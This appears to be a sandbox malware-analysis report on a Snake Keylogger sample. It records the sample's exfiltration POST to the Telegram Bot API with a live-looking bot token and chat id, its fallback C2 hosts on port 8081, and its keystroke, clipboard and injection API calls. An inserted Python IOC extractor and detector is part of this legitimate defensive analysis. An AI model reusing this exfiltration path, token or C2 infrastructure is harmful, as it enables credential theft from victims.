                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146433139&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32545f3d1fd1Host: api.telegram.orgContent-Length: 584
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 19:37:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003259000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000328A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003254000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003180000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003180000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000313B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.4603067666.000000000327B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003285000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 443, in both directions, with local ports 49711, 49712, 49715, 49727, 49739, 49750, 49758, 49770, 49782, 49787 and 49830
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49787 version: TLS 1.2
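The traffic and memory strings above describe the stealer's reporting path: a public-IP lookup against checkip.dyndns.org with a hard-coded MSIE 6.0 User-Agent, a geolocation lookup at reallyfreegeoip.org/xml/<ip>, then a multipart POST to the Telegram Bot API with the bot token in the URL path and the chat_id in the query string, with three DDNS hosts and one bare IP on TCP/8081 kept as alternate endpoints. One detail worth reading off the report: the 404 from api.telegram.org (application/json, 55 bytes) is the reply Telegram gives when the bot token in the path is not accepted, so the sendDocument upload in this run did not reach the operator's chat; the token and chat_id remain useful as hunting IOCs. The Python below is an added example, not code from the report or from the sample. It turns those observations into an IOC extractor for memory strings and a per-client detector over proxy log lines. The host names are the ones listed in the report; the tab-separated log layout, the bot token, the chat id, the timestamps and the second client are constructed for the example.

```python
"""Added example for this report (not code from the sandbox or from the sample).

Two checks built from the network behaviour recorded above:
  * extract_iocs(): pulls Telegram bot tokens, chat IDs and :8081 fallback
    C2 hosts out of memory strings;
  * detect_beacon_chain(): flags a client in proxy logs that performs the
    observed sequence checkip.dyndns.org (MSIE 6.0 UA) -> reallyfreegeoip.org
    -> POST api.telegram.org/bot<token>/send*.
Log layout, bot token, chat id and log lines are constructed for the example.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Telegram Bot API call: numeric bot id, ':', 35-character secret, method name, optional query.
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(\d{6,12}:[A-Za-z0-9_-]{35})/(\w+)(?:\?(\S*))?"
)
# Alternate C2 endpoints the stealer keeps on TCP/8081 (DDNS hosts and a bare IP in the report).
C2_8081_RE = re.compile(r"https?://([A-Za-z0-9.-]+):8081(?![\w.])")
# User-Agent hard-coded in the IP-lookup beacon; note the missing space in ".NET CLR1.0.3705".
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"


def extract_iocs(strings):
    """Return {'telegram_tokens', 'chat_ids', 'c2_hosts'} found in an iterable of strings."""
    iocs = {"telegram_tokens": set(), "chat_ids": set(), "c2_hosts": set()}
    for s in strings:
        for m in TELEGRAM_BOT_RE.finditer(s):
            iocs["telegram_tokens"].add(m.group(1))
            # chat_id travels in the query string of sendMessage / sendDocument
            for cid in parse_qs(m.group(3) or "").get("chat_id", []):
                iocs["chat_ids"].add(cid)
        for m in C2_8081_RE.finditer(s):
            iocs["c2_hosts"].add(m.group(1))
    return iocs


def detect_beacon_chain(log_lines):
    """Return {client: {'token', 'method'}} for clients that completed all three stages.

    Each log line is tab-separated: time, client, method, host, path, user_agent.
    Stages must occur in order; a client that only does the IP lookup, or does it
    with a normal browser User-Agent, is not reported.
    """
    stage = defaultdict(int)   # client -> highest stage reached so far
    hits = {}
    for line in log_lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 6:
            continue           # malformed line: skip it instead of crashing the detector
        _, client, method, host, path, ua = fields
        s = stage[client]
        if s == 0 and method == "GET" and host == "checkip.dyndns.org" and ua == BEACON_UA:
            stage[client] = 1
        elif s == 1 and method == "GET" and host == "reallyfreegeoip.org" and path.startswith("/xml/"):
            stage[client] = 2
        elif s == 2 and method == "POST" and host == "api.telegram.org":
            m = TELEGRAM_BOT_RE.match("https://" + host + path)
            if m and m.group(2).startswith("send"):
                stage[client] = 3
                hits[client] = {"token": m.group(1), "method": m.group(2)}
    return hits


# Constructed inputs. Host names are the ones listed in the report; the token,
# chat id, timestamps and the second client are made up for the example.
FAKE_TOKEN = "1234567890:AAFexampleTOKEN0123456789abcdefGHIJ"
SAMPLE_STRINGS = [
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "http://varders.kozow.com:8081",
    "http://51.38.247.67:8081/_send_.php?L",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",   # format template, no token
    "https://api.telegram.org/bot" + FAKE_TOKEN + "/sendDocument?chat_id=111111111&caption=x",
]
SAMPLE_LOG = [
    "2025-01-10T19:37:40\t192.168.2.6\tGET\tcheckip.dyndns.org\t/\t" + BEACON_UA,
    "2025-01-10T19:37:41\t192.168.2.6\tGET\treallyfreegeoip.org\t/xml/203.0.113.5\t" + BEACON_UA,
    "2025-01-10T19:37:54\t192.168.2.6\tPOST\tapi.telegram.org\t/bot" + FAKE_TOKEN
    + "/sendDocument?chat_id=111111111\t-",
    # benign client: same lookups from a normal browser, no Telegram upload
    "2025-01-10T19:40:00\t192.168.2.7\tGET\tcheckip.dyndns.org\t/\tMozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "2025-01-10T19:40:01\t192.168.2.7\tGET\treallyfreegeoip.org\t/xml/203.0.113.6\tMozilla/5.0 (Windows NT 10.0; Win64; x64)",
]

if __name__ == "__main__":
    print(extract_iocs(SAMPLE_STRINGS))
    print(detect_beacon_chain(SAMPLE_LOG))
```

The detector deliberately keys on the exact User-Agent for the first stage: checkip.dyndns.org and reallyfreegeoip.org are also visited by legitimate software, so the stale MSIE 6.0 string and the strict ordering are what separate this sample from background noise. When hunting in real logs, add the four :8081 hosts and the `_send_.php` path from the memory strings as plain host and URL matches, since that fallback path does not pass through Telegram at all.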
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00394164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard (listed twice in the report)
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00393F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                  System Summary

Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen)
Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen)
Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen)
Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen)
Source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
Source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00323B3A This is a third-party compiled AutoIt script.
Source: 19d6P55zd1.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 19d6P55zd1.exe, 00000000.00000000.2129021988.00000000003D4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_e102d34a-8)
Source: 19d6P55zd1.exe, 00000000.00000000.2129021988.00000000003D4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_57276ffa-e)
Source: 19d6P55zd1.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_03e29e4e-5)
Source: 19d6P55zd1.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_860bf518-7)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00378310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code functions: 0_2_0032E6A0, 0_2_0034D975, 0_2_0032FCE0, 0_2_003421C5, 0_2_003562D2, 0_2_003A03DA, 0_2_0035242E, 0_2_003425FA, 0_2_0037E616, 0_2_003366E1, 0_2_0035878F, 0_2_00338808, 0_2_003A0857, 0_2_00356844, 0_2_00388889, 0_2_00360AB4, 0_2_0034CB21, 0_2_00356DB6, 0_2_00336F9E, 0_2_00333030, 0_2_00343187, 0_2_0034F1D9, 0_2_00321287, 0_2_00341484, 0_2_00335520, 0_2_00347696, 0_2_00335760, 0_2_00341978, 0_2_00359AB5, 0_2_0034BDA6, 0_2_00341D90, 0_2_003A7DDB, 0_2_0032DF00, 0_2_00333FE0, 0_2_0123ABD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code functions: 2_2_0156C146, 2_2_0156A088, 2_2_01565362, 2_2_0156D278, 2_2_0156C468, 2_2_0156C738, 2_2_0156E988, 2_2_015669A0, 2_2_01563B95, 2_2_0156CA08, 2_2_0156CCD8, 2_2_01566FC8, 2_2_0156CFA9, 2_2_01563E09, 2_2_0156F631, 2_2_0156E97A, 2_2_015629EC, 2_2_0156FA88, 2_2_01563AA1, 2_2_05B561E8, 2_2_05B5F158, 2_2_05B52DA8, 2_2_05B54D98, 2_2_05B52D9A, 2_2_05B54D89, 2_2_05B50DF0, 2_2_05B50DE0, 2_2_05B57508, 2_2_05B5BCB2, 2_2_05B5D4A8, 2_2_05B5D497, 2_2_05B5EC90, 2_2_05B5EC81, 2_2_05B52488, 2_2_05B58CF0, 2_2_05B574F8, 2_2_05B58CE1, 2_2_05B504D0, 2_2_05B5A4D8, 2_2_05B5BCC0, 2_2_05B504C0, 2_2_05B5A4C8, 2_2_05B52477, 2_2_05B54478, 2_2_05B54467, 2_2_05B5E7B9, 2_2_05B59FFF, 2_2_05B51FF8, 2_2_05B5B7F8, 2_2_05B5CFE0, 2_2_05B53FE8, 2_2_05B51FE8, 2_2_05B5B7E8, 2_2_05B5CFD0, 2_2_05B53FD8, 2_2_05B5E7C8, 2_2_05B51710, 2_2_05B51701, 2_2_05B566B0, 2_2_05B536B9, 2_2_05B556B8, 2_2_05B566A0, 2_2_05B556A9, 2_2_05B57E98, 2_2_05B59680, 2_2_05B57E88, 2_2_05B536C8, 2_2_05B5DE38, 2_2_05B5F620, 2_2_05B5DE28, 2_2_05B5F610, 2_2_05B5966F, 2_2_05B5AE68, 2_2_05B5C650, 2_2_05B5AE58, 2_2_05B5C641, 2_2_05B591B8, 2_2_05B591A7, 2_2_05B5A9A0, 2_2_05B5A98F, 2_2_05B5C188, 2_2_05B579D0, 2_2_05B561D9, 2_2_05B579C0, 2_2_05B52918, 2_2_05B54908, 2_2_05B5290A, 2_2_05B5D970, 2_2_05B5C178, 2_2_05B50960, 2_2_05B5D960, 2_2_05B50950, 2_2_05B5F147, 2_2_05B548F9, 2_2_05B5702F, 2_2_05B58828, 2_2_05B5A010, 2_2_05B58819, 2_2_05B50006, 2_2_05B50040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B570402_2_05B57040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B55B372_2_05B55B37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5B3302_2_05B5B330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B59B382_2_05B59B38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5CB162_2_05B5CB16
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5B31F2_2_05B5B31F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5CB182_2_05B5CB18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5E3002_2_05B5E300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B56B782_2_05B56B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B583602_2_05B58360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B51B682_2_05B51B68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B56B6A2_2_05B56B6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B583502_2_05B58350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B53B582_2_05B53B58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B51B582_2_05B51B58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B55B482_2_05B55B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B59B482_2_05B59B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B53B482_2_05B53B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B512802_2_05B51280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5E2EF2_2_05B5E2EF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5FAE82_2_05B5FAE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5FAD72_2_05B5FAD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B532382_2_05B53238
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B532272_2_05B53227
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B552282_2_05B55228
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B552182_2_05B55218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5126F2_2_05B5126F
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: String function: 00340AE3 appears 70 times
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: String function: 00327DE1 appears 35 times
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: String function: 00348900 appears 42 times
                  Source: 19d6P55zd1.exe, 00000000.00000003.2161860434.0000000003A13000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 19d6P55zd1.exe
                  Source: 19d6P55zd1.exe, 00000000.00000003.2162748728.0000000003BBD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 19d6P55zd1.exe
                  Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs 19d6P55zd1.exe
                  Source: 19d6P55zd1.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
